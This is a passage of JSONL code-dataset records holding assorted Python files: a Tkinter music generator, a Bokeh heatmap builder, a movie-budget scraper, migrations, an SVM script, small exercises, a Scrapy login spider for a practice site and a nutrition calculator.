\"\\n\")\n file.write(part + \"\\n\")\n file.close()\n\n\ndef title_creation(title_current_song, inv, tr):\n \"\"\"\n Create a title for a new song based on the title of the current song and transformation applied\n :param str title_current_song: title of the current song\n :param int inv: ticked box or not, e.g. 1 if ticked\n :param int tr: value of the transposition, e.g. -2 to down transposed of two half tones\n :return res: the new title\n :rtype str\n effect on the program: new songs have a fitting title\n \"\"\"\n res = title_current_song\n if inv == 1:\n res += \" reverse\"\n if tr != 0:\n res += \" transposed of \" + str(tr)\n return res\n\n\ndef set_croche_duration(duration):\n \"\"\"\n Set the croche duration in seconds based on a string giving the number of ms\n :param str duration: duration of a note in ms\n :return None, directly set the global variable glob_croche_duration\n effect on the program: give the speed of the song, e.g. 250 is two times slower than 125\n \"\"\"\n global glob_croche_duration\n # https://stackoverflow.com/questions/1265665/how-can-i-check-if-a-string-represents-an-int-without-using-try-except\n if duration.isdigit():\n dur = float(duration)\n if 0 < dur < 4000:\n glob_croche_duration = dur / 1000 # to convert seconds in ms\n\n\n# Functions to be called by graphical interface\n\ndef markov_chain_v1():\n \"\"\"\n Creation of a new musical rhythm using Markov chain version 1 based on the full collection\n glob_collection will be used as input (all songs) and output (one song added)\n :return None, to be used by Tkinter menu\n effect on the program: create a new song, add to the text file, add to the listbox\n \"\"\"\n nc = creation_partition_v1(glob_collection)\n dc = creation_duree_v1(glob_collection)\n title = \"#\" + str(len(glob_collection)) + \" New musical rhythm of Markov1\"\n markov_song_v1 = (title, noteduree_to_partition(nc, dc))\n addition_if_needed(markov_song_v1)\n\n\ndef markov_chain_v2():\n \"\"\"\n Creation of a new musical rhythm using Markov chain version 2 based on the full collection\n glob_collection will be used as input (all songs) and output (one song added)\n :return None, to be used by Tkinter menu\n effect on the program: create a new song, add to the text file, add to the listbox\n \"\"\"\n nc = creation_partition_v2(glob_collection)\n dc = creation_duree_v2(glob_collection)\n title = \"#\" + str(len(glob_collection)) + \" New musical rhythm of Markov2\"\n markov_song_v2 = (title, noteduree_to_partition(nc, dc))\n addition_if_needed(markov_song_v2)\n\n\ndef play_song():\n \"\"\"\n Create and play the sound of the song currently selected in the list box\n :return None, drive the audio output\n effect on the program: sound of the song played\n \"\"\"\n song_num = glob_lbsong.curselection()[0]\n partition = glob_collection[song_num][1]\n (n, d) = partition_to_noteduree(partition)\n tr = int(glob_transpo.get())\n n = transposition(n, tr)\n\n inv = int(glob_inv.get())\n if inv == 1:\n n = inversion(n)\n\n title_current_song = glob_collection[song_num][0]\n addition_if_needed((title_creation(title_current_song, inv, tr), noteduree_to_partition(n, d)))\n\n set_croche_duration(glob_croche_dur_sv.get())\n\n f = frequences(n)\n play_notes(f, d)\n\n\n# Graphical interface functions using Tkinter\n\ndef setting_songs_list():\n \"\"\"\n Display the list of songs on the screen using the collection\n :return None, drive on the graphic interface\n effect on the program: full fill the listbox with all the titles\n \"\"\"\n global glob_lbsong\n lb = tk.Listbox(glob_root, width=40, height=6,\n selectmode=tk.SINGLE)\n for element in glob_collection:\n (title, part) = element\n lb.insert(tk.END, title) # tk.END is a defined constant that is added at the end of a list\n lb.select_set(0) # set the default value\n lb.grid(row=0, column=0, rowspan=3)\n glob_lbsong = lb\n\n\ndef transformation_settings():\n \"\"\"\n Setting up a cell to enter the value of the transposition, a box to ticked for an inversion,\n a cell to enter the value of the duration of a croche and a button to trigger play\n :return None, set up the graphic interface\n effect on the program: set the graphic interface to transform the play of a partition\n \"\"\"\n global glob_root, glob_transpo\n # transposition\n le = tk.Label(text=\"transposition\")\n le.grid(row=1, column=2, sticky=tk.W)\n e = tk.Entry(width=3, textvariable=glob_transpo)\n e.grid(row=1, column=1, sticky=tk.E)\n glob_transpo.set('0')\n\n # inversion\n cb = tk.Checkbutton(text=\"inversion\", variable=glob_inv)\n cb.grid(row=2, column=1, columnspan=2)\n glob_inv.set('0')\n\n # croche duration\n cd = tk.Label(text=\"croche duration in ms\")\n cd.grid(row=0, column=2, sticky=tk.W)\n d = tk.Entry(width=5, textvariable=glob_croche_dur_sv)\n d.grid(row=0, column=1, sticky=tk.E)\n glob_croche_dur_sv.set('125')\n\n # play\n bplay = tk.Button(text=\"Play\", command=play_song)\n bplay.grid(row=1, column=3)\n\n\ndef menus_settings():\n \"\"\"\n Setting up the menus to choose to use the Markov chains, to test the loudspeakers and to use different instruments\n :return None, set up the graphic interface\n effect on the program: set the graphic interface regarding top bar menus\n \"\"\"\n global glob_root\n glob_root.title(\"Capucine and Emma\")\n menu_bar = tk.Menu(glob_root)\n glob_root.config(menu=menu_bar)\n\n menu_markov = tk.Menu(menu_bar)\n menu_markov.add_command(label=\"Version 1\", command=markov_chain_v1)\n menu_markov.add_command(label=\"Version 2\", command=markov_chain_v2)\n menu_bar.add_cascade(label=\"Markov chains\", menu=menu_markov)\n\n menu_avance = tk.Menu(menu_bar)\n menu_avance.add_command(label=\"Sound test loudspeakers\", command=sound_test_loudspeakers)\n menu_avance.add_command(label=\"Sound test superposition\", command=sound_test_superposition)\n menu_avance.add_separator()\n menu_avance.add_radiobutton(label=\"Instrument: sinus\", var=glob_instrum, value=\"Sinus\")\n menu_avance.add_radiobutton(label=\"Instrument: rectangles\", var=glob_instrum, value=\"Rectangles\")\n menu_avance.add_radiobutton(label=\"Instrument: organ\", var=glob_instrum, value=\"Organ\")\n menu_avance.add_radiobutton(label=\"Instrument: UFO\", var=glob_instrum, value=\"UFO\")\n glob_instrum.set(\"Sinus\") # set the default value\n menu_bar.add_cascade(label=\"Advanced\", menu=menu_avance)\n\n\ndef canvas_settings():\n \"\"\"\n Define two Canvas to have an area dedicated to the drawings\n :return None, set up the graphic interface\n impact of the program: signals could be draw in these two areas\n \"\"\"\n global glob_canvas1, glob_canvas2\n glob_canvas1 = Canvas(width=600, height=50)\n glob_canvas2 = Canvas(width=600, height=300)\n glob_canvas1.grid(row=3, column=0, columnspan=4)\n glob_canvas2.grid(row=4, column=0, columnspan=4)\n\n\ndef drawing1(signal):\n \"\"\"\n Draw the general signal of a note on a coordinate system\n :param np.array signal: signal of a note between -1 and 1\n :return None, drive on the graphic interface\n effect on the program: display a drawing of the signal attitude during the first 600ms\n \"\"\"\n glob_canvas1.delete(\"all\")\n # horizontal axis\n glob_canvas1.create_line(0, 27, 600, 27, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 22, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 32, width=1, fill=\"red\")\n for i in range(1, 10):\n t = i / 10\n horizontal = int(t * 1000)\n glob_canvas1.create_line(horizontal, 23, horizontal, 31, width=1, fill=\"red\")\n legend = \"{0}s\".format(t)\n glob_canvas1.create_text(horizontal, 36, text=legend, fill=\"black\")\n\n # vertical axis\n glob_canvas1.create_line(0, 27, 600, 27, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 22, width=1, fill=\"red\")\n glob_canvas1.create_line(600, 27, 590, 32, width=1, fill=\"red\")\n for i in range(1, 10):\n t = i / 10\n horizontal = int(t * 1000)\n glob_canvas1.create_line(horizontal, 23, horizontal, 31, width=1, fill=\"red\")\n legend = \"{0}s\".format(t)\n glob_canvas1.create_text(horizontal, 36, text=legend, fill=\"black\")\n\n y = signal[0]\n vertical_pre = 24 * (1 - y) + 3\n for h in range(1, 600):\n t = h / 1000\n ind = int(t * sample_rate)\n if ind >= len(signal):\n break # stop drawing if the signal finish before 0.6s\n y = signal[ind]\n vertical = 24 * (1 - y) + 3\n glob_canvas1.create_line(h - 1, vertical_pre, h, vertical, width=1, fill=\"blue\")\n vertical_pre = vertical\n glob_canvas1.update() # useful for PC ??\n\ndef drawing2(signal):\n \"\"\"\n Draw the signal of the beginning of a note on a coordinate system\n :param np.array signal: signal of a note between -1 and 1\n :return None, drive on the graphic interface\n effect on the program: display a drawing of the beginning of signal\n on the horizontal axis, 1 pixel corresponds to 1/glob_sample_rate seconds\n \"\"\"\n glob_canvas2.delete(\"all\")\n # horizontal axis\n glob_canvas2.create_line(0, 152, 600, 152, width=1, fill=\"red\")\n glob_canvas2.create_line(600, 152, 590, 142, width=1, fill=\"red\")\n glob_canvas2.create_line(600, 152, 590, 162, width=1, fill=\"red\")\n for i in range(1, 100):\n t = i / 100\n horizontal = int(t * sample_rate)\n glob_canvas2.create_line(horizontal + 9, 148, horizontal + 9, 156, width=1, fill=\"red\")\n legend = \"{0}s\".format(t)\n glob_canvas2.create_text(horizontal + 9, 161, text=legend, fill=\"black\")\n\n # vertical axis\n glob_canvas2.create_line(9, 5, 9, 300, width=1, fill=\"red\")\n glob_canvas2.create_line(9, 5, 14, 10, width=1, fill=\"red\")\n glob_canvas2.create_line(9, 5, 4, 10, width=1, fill=\"red\")\n for i in range(-4, 4):\n y = i / 4\n vertical = 149 * (1 - y) + 3\n glob_canvas2.create_line(4, vertical, 14, vertical, width=1, fill=\"red\")\n legend = \"{0}\".format(y)\n glob_canvas2.create_text(24, vertical, text=legend, fill=\"black\")\n\n y = signal[0]\n vertical_pre = 149 * (1 - y) + 3\n last_i = min(len(signal), 600)\n for i in range(1, last_i):\n y = signal[i]\n vertical = 149 * (1 - y) + 3\n glob_canvas2.create_line(i - 1 + 9, vertical_pre, i + 9, vertical, width=1, fill=\"blue\")\n vertical_pre = vertical\n glob_canvas2.update() # useful on PC ??\n\n\ndef draw(signal):\n \"\"\"\n Draw the signal on two Canvas\n :param np.array signal: signal of a note between -1 and 1\n :return None, drive on the graphic interface\n effect on the program: display the signal on two drawings with different horizontal axis scale\n \"\"\"\n drawing1(signal)\n drawing2(signal)\n\n\ntransformation_settings()\nmenus_settings()\nglob_collection = file_reading(\"partitions.txt\")\nsetting_songs_list()\ncanvas_settings()\nglob_root.mainloop()\nglob_root.quit()\n","sub_path":"principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":19263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197318978","text":"\"\"\"This is the Bokeh charts interface. It gives you a high level API to build\ncomplex plot is a simple way.\n\nThis is the HeatMap class which lets you build your HeatMap charts just passing\nthe arguments to the Chart class and calling the proper functions.\n\"\"\"\n#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENCE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\nfrom __future__ import print_function, division\n\nfrom ._builder import Builder, create_and_build\nfrom ._data_adapter import DataAdapter\nfrom ..models import ColumnDataSource, FactorRange, GlyphRenderer, HoverTool\nfrom ..models.glyphs import Rect\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\n\ndef HeatMap(values, xscale=\"categorical\", yscale=\"categorical\",\n xgrid=False, ygrid=False, **kw):\n chart = create_and_build(\n HeatMapBuilder, values, xscale=xscale, yscale=yscale,\n xgrid=xgrid, ygrid=ygrid, **kw\n )\n chart.add_tools(HoverTool(tooltips=[(\"value\", \"@rate\")]))\n return chart\n\nclass HeatMapBuilder(Builder):\n \"\"\"This is the HeatMap class and it is in charge of plotting\n HeatMap chart in an easy and intuitive way.\n\n Essentially, it provides a way to ingest the data, make the proper\n calculations and push the references into a source object.\n We additionally make calculations for the ranges.\n And finally add the needed glyphs (rects) taking the references\n from the source.\n\n Examples:\n from collections import OrderedDict\n from bokeh.charts import HeatMap\n\n xyvalues = OrderedDict()\n xyvalues['apples'] = [4,5,8]\n xyvalues['bananas'] = [1,2,4]\n xyvalues['pears'] = [6,5,4]\n hm = HeatMap(xyvalues, title=\"categorical heatmap\", filename=\"cat_heatmap.html\")\n hm.show()\n \"\"\"\n\n def __init__(self, values, legend=False, palette=None, **kws):\n \"\"\"\n Args:\n values (iterable 2d): iterable 2d representing the data series matrix.\n palette(list, optional): a list containing the colormap as hex values.\n legend (str, optional): the legend of your plot. The legend content is\n inferred from incoming input.It can be ``top_left``,\n ``top_right``, ``bottom_left``, ``bottom_right``.\n It is ``top_right`` is you set it as True.\n Defaults to None.\n palette(list, optional): a list containing the colormap as\n hex values.\n\n Attributes:\n source (obj): datasource object for your plot,\n initialized as a dummy None.\n x_range (obj): x-associated datarange object for you plot,\n initialized as a dummy None.\n y_range (obj): y-associated datarange object for you plot,\n initialized as a dummy None.\n groups (list): to be filled with the incoming groups of data.\n Useful for legend construction.\n data (dict): to be filled with the incoming data and be passed\n to the ColumnDataSource in each chart inherited class.\n Needed for _set_And_get method.\n attr (list): to be filled with the new attributes created after\n loading the data dict.\n Needed for _set_And_get method.\n \"\"\"\n if not palette:\n palette = [\"#75968f\", \"#a5bab7\", \"#c9d9d3\", \"#e2e2e2\", \"#dfccce\",\n \"#ddb7b1\", \"#cc7878\", \"#933b41\", \"#550b1d\"]\n super(HeatMapBuilder, self).__init__(values, legend=legend, palette=palette)\n\n\n def get_data(self):\n \"\"\"Take the CategoricalHeatMap data from the input **value.\n\n It calculates the chart properties accordingly. Then build a dict\n containing references to all the calculated points to be used by\n the rect glyph inside the ``draw`` method.\n\n \"\"\"\n self.catsx = list(self.values.columns)\n self.catsy = list(self.values.index)\n\n # Set up the data for plotting. We will need to have values for every\n # pair of year/month names. Map the rate to a color.\n catx = []\n caty = []\n color = []\n rate = []\n for y in self.catsy:\n for m in self.catsx:\n catx.append(m)\n caty.append(y)\n rate.append(self.values[m][y])\n\n # Now that we have the min and max rates\n factor = len(self._palette) - 1\n den = max(rate) - min(rate)\n for y in self.catsy:\n for m in self.catsx:\n c = int(round(factor*(self.values[m][y] - min(rate)) / den))\n color.append(self._palette[c])\n\n width = [0.95] * len(catx)\n height = [0.95] * len(catx)\n\n self.data = dict(catx=catx, caty=caty, color=color, rate=rate,\n width=width, height=height)\n\n def get_source(self):\n \"\"\"Push the CategoricalHeatMap data into the ColumnDataSource\n and calculate the proper ranges.\n \"\"\"\n self.source = ColumnDataSource(self.data)\n self.x_range = FactorRange(factors=self.catsx)\n self.y_range = FactorRange(factors=self.catsy)\n\n def draw(self):\n \"\"\"Use the rect glyphs to display the categorical heatmap.\n\n Takes reference points from data loaded at the ColumnDataSurce.\n \"\"\"\n glyph = Rect(\n x=\"catx\", y=\"caty\",\n width=\"width\", height=\"height\",\n fill_color=\"color\", fill_alpha=0.7,\n line_color=\"white\"\n )\n renderer = GlyphRenderer(data_source=self.source, glyph=glyph)\n # TODO: Legend??\n yield renderer\n\n def prepare_values(self):\n \"\"\"Prepare the input data.\n\n Converts data input (self.values) to a DataAdapter\n \"\"\"\n self.values = DataAdapter(self.values, force_alias=True)","sub_path":"bokeh/charts/catheatmap.py","file_name":"catheatmap.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"5026215","text":"#import urllib2\nimport json\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\nimport itertools\nfrom multiprocessing import Pool, Manager\n#output = open(\"/Users/WeiXing/Desktop/movies_budget.txt\", \"w\")\n\n#url = \"http://www.the-numbers.com/movie/budgets/all\"\n\n#page = urllib2.urlopen(url)\ndata = list()\n#titles = list()\nnewData = list()\nmanager = Manager()\nmovieMap = manager.dict()\ntitlesLength = dict()\ntitlesContent = dict()\ngenres = list()\ndef generateCSVData(year):\n tmpTitles = []\n for row in table.findAll(\"tr\")[1:]:\n tmpArr = []\n cells = row.findAll(\"td\")\n if(not cells):\n continue\n \n release_date = cells[1].findAll(text=True)[0].encode(\"utf-8\")\n\n if(year is not None and int(release_date.split(\"/\")[2]) != year):\n continue\n\n title = cells[2].findAll(text=True)[0].encode(\"utf-8\")\n budget = cells[3].findAll(text=True)[0].encode(\"utf-8\")\n domestic_gross = cells[4].findAll(text=True)[0].encode(\"utf-8\")\n worldwide_gross = cells[5].findAll(text=True)[0].encode(\"utf-8\")\n\n tmpArr.append(title)\n tmpArr.append(release_date)\n tmpArr.append(budget)\n tmpArr.append(domestic_gross)\n tmpArr.append(worldwide_gross)\n \n #titles.append(title)\n tmpTitles.append(title)\n data.append(tmpArr)\n\n return tmpTitles\n\n\ndef apiCall(title):\n #call api to get supplementary information about the movie\n tmpArr = []\n extra_fields = [\"Genre\", \"Director\", \"Awards\", \"imdbRating\"]\n url = \"http://www.omdbapi.com/?t=\"+title+\"&y=&plot=short&r=json\"\n response = requests.get(url).text\n respDict = json.loads(response)\n if(\"Error\" in respDict):\n print(respDict[\"Error\"])\n for field in extra_fields:\n tmpArr.append(\"None\")\n else:\n for field in extra_fields:\n tmpArr.append(respDict[field].encode(\"utf-8\"))\n movieMap[title] = tmpArr\n\ndef writeToCSV(year):\n #perform data join between info from the html table and the info returned from the api call\n for record in data:\n title = record[0]\n extraInfo = movieMap[title]\n if(extraInfo[3] == \"None\" or extraInfo[3] == \"N/A\"):\n continue\n tokens = extraInfo[0].split(\",\")\n for token in tokens:\n if(token.strip() not in genres):\n genres.append(token.strip())\n newData.append(record+extraInfo)\n\n csvHeader = [\"Title\", \"Release Date\", \"Budget\", \"Domestic Gross\", \"Worldwide Gross\", \"Genre\", \"Director\", \"Awards\", \"imdbRating\"]\n if year is not None:\n with open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets/movie_budget_\"+str(year)+\".csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(csvHeader)\n csvwriter.writerows(newData)\n else:\n with open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets/movie_budget_all.csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(csvHeader)\n csvwriter.writerows(newData)\n\ndef generateAll():\n for year in range(2010, 2016):\n tmpTitles = generateCSVData(year)\n print(\"The length is \"+str(len(tmpTitles)))\n p = Pool(len(tmpTitles))\n p.map(apiCall, tmpTitles)\n p.terminate()\n \n writeToCSV(None)\n\n\nif __name__ == '__main__':\n input = open(\"/Users/WeiXing/Projects/Info5100Project3/movie_budgets.html\", \"r\")\n soup = BeautifulSoup(input)\n\n table = soup.find(\"table\", { \"id\": \"budgets\" })\n #generate csv file for each year respectively\n '''\n for year in range(2010, 2016):\n tmpTitles = generateCSVData(year)\n print(\"The length of titles list is \"+str(len(tmpTitles)))\n p = Pool(len(tmpTitles))\n p.map(apiCall, tmpTitles)\n writeToCSV(year)\n '''\n #generate one csv file containing all the movie records\n generateAll()\n print(genres)\n\n\n\n \n\n\n\n\n\n\n\n\n \n\n ","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"458107215","text":"\n\nfrom xai.brain.wordbase.adjectives._wacky import _WACKY\n\n#calss header\nclass _WACKIER(_WACKY, ):\n\tdef __init__(self,): \n\t\t_WACKY.__init__(self)\n\t\tself.name = \"WACKIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"wacky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_wackier.py","file_name":"_wackier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199635247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Challenges of Python from HackerRank.\n\nThis is a basic python challenge specified by `HackerRank`_.\n\n.. _HackerRank:\n https://www.hackerrank.com/challenges/itertools-permutations\n\"\"\"\n\nfrom itertools import permutations\n\ndef main():\n \"\"\"The main routine.\"\"\"\n string, number = input().strip().split()\n\n for element in sorted(list(permutations(list(string), int(number)))):\n print(\"\".join(element))\n\nif __name__ == '__main__':\n main()\n","sub_path":"hackerrank/practice/python/itertools/itertools_permutations.py","file_name":"itertools_permutations.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147179353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.contrib.gis.db.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('custom_users', '0001_initial'),\n ('interests', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=30)),\n ('subtitle', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=250)),\n ('location', django.contrib.gis.db.models.fields.PointField(srid=4326, null=True, blank=True)),\n ('beggining', models.DateTimeField()),\n ('end', models.DateTimeField(null=True, blank=True)),\n ('cost', models.IntegerField(null=True, blank=True)),\n ('type', models.CharField(max_length=10, choices=[(b'PRIV', b'Private'), (b'PUB', b'Public')])),\n ('min_people', models.IntegerField()),\n ('max_people', models.IntegerField(null=True, blank=True)),\n ('attending', models.ManyToManyField(related_name='event_attending', to='custom_users.CustomUser', blank=True)),\n ('host', models.ForeignKey(related_name='event_host', to='custom_users.CustomUser')),\n ('interest', models.ForeignKey(to='interests.Interest')),\n ],\n options={\n 'verbose_name': 'event',\n 'verbose_name_plural': 'events',\n },\n ),\n ]\n","sub_path":"events/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"481812077","text":"import numpy as np\nimport data_proc\nfrom sklearn.svm import SVC \nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.externals import joblib\n\n'''use sgd with hinge loss to do svm on large data'''\n\ndef svm_train():\n\n\tmodel = SVC(verbose=True)\n\ttrain_iterators=data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [2,3,4],svm=True)\n\tfor i, (X_train, Y_train) in enumerate(train_iterators):\n\t\tmodel.fit(X_train,Y_train)\n\t\tjoblib.dump(model, \"svm1.m\")\n\t\n\tclf = joblib.load(\"svm1.m\")\n\ttest_iterators=data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [9],svm=True)\n\tfor i, (X_test, Y_test) in enumerate(test_iterators):\n\t\tY_pred = clf.predict(X_test)\n\t\tprint(accuracy_score(Y_test, Y_pred))\n\ndef svm_predict(X_test):\n\tclf = joblib.load(\"svm.m\")\n\tres = clf.predict(X_test)\n\treturn np.reshape(res,(res.shape[0],1))\n\ndef svm_sgd():\n\tsgd_clf = SGDClassifier(loss=\"hinge\", penalty=\"l2\")\n\tminibatch_train_iterators = data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [1,2,3,4,5,6],sgd=True)\n\n\tfor i, (X_train, y_train) in enumerate(minibatch_train_iterators):\n\t sgd_clf.partial_fit(X_train, y_train, classes=np.array([0, 1]))\n\t print(\"{} time\".format(i)) \n\t #print(\"{} score\".format(sgd_clf.score(X_test, y_test))) \n\tjoblib.dump(sgd_clf, \"svm.m\")\n\n\tclf = joblib.load(\"svm.m\")\n\ttest_iterators = data_proc.generator_from_path_group(\"marketing_data/m0000/\", file_set = [7,8],test=True)\n\tfor i, (X_test, y_test) in enumerate(test_iterators):\n\t\tY_pred = clf.predict(X_test)\n\t\tprint(accuracy_score(y_test, Y_pred))\n\n\n\nif __name__=='__main__':\n\t'''\n\tx_train,y_train,x_test,y_test = data_proc.load_data_grouped('TK_m0000[s20170404 00205000_e20170414 00153000]20170410_1755_46.csv')\n\tsvm_train(x_train,y_train,x_test,y_test)\n\t'''\n\t#svm_sgd()\n\tsvm_train()","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"515154326","text":"def is_anagram(str1, str2):\n if len(str1) != len(str2):\n return False\n char_map = {}\n\n for char in str1:\n char_map[char] = char_map[char] + 1 if char in char_map else 1\n\n for char in str2:\n if char_map.get(char) is not None and char_map[char] > 0:\n char_map[char] -= 1\n else:\n return False\n return True\n\n\nprint(is_anagram(\"READ\", \"DEAR\"))\nprint(is_anagram(\"CAST\", \"TASK\"))\n\n\ndef anagram(s1, s2):\n if len(s1) != len(s2):\n return False\n c = [0] * 255\n for ch in s1:\n c[ord(ch)] += 1\n for ch in s2:\n if c[ord(ch)] == 0:\n return False\n c[ord(ch)] -= 1\n\n for i in c:\n if i != 0:\n return False\n return True\n\nprint(anagram('read', 'dear'))\n","sub_path":"Interview Questions/Misc/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282757675","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Deleting field 'SaltCommand.created'\n db.delete_column(u'main_saltcommand', 'created')\n\n # Deleting field 'SaltCommand.modified'\n db.delete_column(u'main_saltcommand', 'modified')\n\n # Adding field 'SaltCommand.order'\n db.add_column(u'main_saltcommand', 'order',\n self.gf('django.db.models.fields.PositiveIntegerField')(default=1, db_index=True),\n keep_default=False)\n\n\n def backwards(self, orm):\n # Adding field 'SaltCommand.created'\n db.add_column(u'main_saltcommand', 'created',\n self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),\n keep_default=False)\n\n # Adding field 'SaltCommand.modified'\n db.add_column(u'main_saltcommand', 'modified',\n self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),\n keep_default=False)\n\n # Deleting field 'SaltCommand.order'\n db.delete_column(u'main_saltcommand', 'order')\n\n\n models = {\n u'main.saltarg': {\n 'Meta': {'ordering': \"['order']\", 'object_name': 'SaltArg'},\n 'command': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['main.SaltCommand']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),\n 'value': ('django.db.models.fields.CharField', [], {'max_length': '256'})\n },\n u'main.saltcommand': {\n 'Meta': {'ordering': \"['order']\", 'object_name': 'SaltCommand'},\n 'description': ('django.db.models.fields.TextField', [], {}),\n 'hipchat_notification_msg': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'key': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),\n 'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),\n 'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),\n 'salt_function': ('django.db.models.fields.CharField', [], {'max_length': '256'}),\n 'salt_target': ('django.db.models.fields.CharField', [], {'max_length': '256'})\n }\n }\n\n complete_apps = ['main']","sub_path":"django_saltstack/main/migrations/0003_auto__del_field_saltcommand_created__del_field_saltcommand_modified__a.py","file_name":"0003_auto__del_field_saltcommand_created__del_field_saltcommand_modified__a.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350967204","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.http import Request,FormRequest\n\nclass LoginSpider(scrapy.Spider):\n name = 'Login'\n allowed_domains = ['example.webscraping.com']\n start_urls = ['http://example.webscraping.com/places/default/user/profile?_next=/places/default/edit/China-47']\n\n def parse(self, response):\n keys = response.xpath('//*[@id=\"web2py_user_form\"]/form/table//label').xpath('./text()').re(\"(.+): \")\n values = response.xpath('//*[@id=\"web2py_user_form\"]/form/table//td[@class=\"w2p_fw\"]/text()').extract()\n yield dict(zip(keys, values))\n\n def start_requests(self):\n login_url = 'http://example.webscraping.com/places/default/user/login?_next=/places/default/edit/China-47'\n yield Request(login_url, callback=self.login)\n\n def login(self, response):\n sel = response.xpath('//*[@id=\"web2py_user_form\"]/form/div/input')\n fd = dict(zip(sel.xpath('./@name').extract(), sel.xpath('./@value').extract()))\n fd['email'] = '136219065@qq.com'\n fd['password'] = '123456'\n request = FormRequest('http://example.webscraping.com/places/default/user/login?_next=/places/default/edit/China-47', formdata=fd, callback=self.parse_login)\n yield request\n\n def parse_login(self, response):\n if 'Welcome ' in response.text:\n yield from super().start_requests()\n\n\n\n","sub_path":"scrapy/login/login/spiders/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281100174","text":"import pandas as pd\nexcel_data = pd.read_csv(\"my_excel_data.csv\")\n\ndef get_macros(food):\n macros = []\n macros.extend(excel_data[excel_data.name == food].calories)\n macros.extend(excel_data[excel_data.name == food].fat)\n macros.extend(excel_data[excel_data.name == food].protein)\n macros.extend(excel_data[excel_data.name == food].carb)\n macros.extend(excel_data[excel_data.name == food].fiber)\n macros.extend(excel_data[excel_data.name == food].serving)\n return macros\n\n\ntotals = {\n 'calories': 0,\n 'protein': 0,\n 'fat': 0,\n 'carbs': 0,\n 'fiber': 0,\n 'net_carbs': 0\n}\n\ndef add_food(food, grams):\n totals['calories'] += get_macros(food)[0] * grams / get_macros(food)[5]\n totals['fat'] += get_macros(food)[1] * grams / get_macros(food)[5]\n totals['protein'] += get_macros(food)[2] * grams / get_macros(food)[5]\n totals['carbs'] += get_macros(food)[3] * grams / get_macros(food)[5]\n totals['fiber'] += get_macros(food)[4] * grams / get_macros(food)[5]\n totals['net_carbs'] += (get_macros(food)[3] * grams / get_macros(food)[5]) - (get_macros(food)[4] * grams / 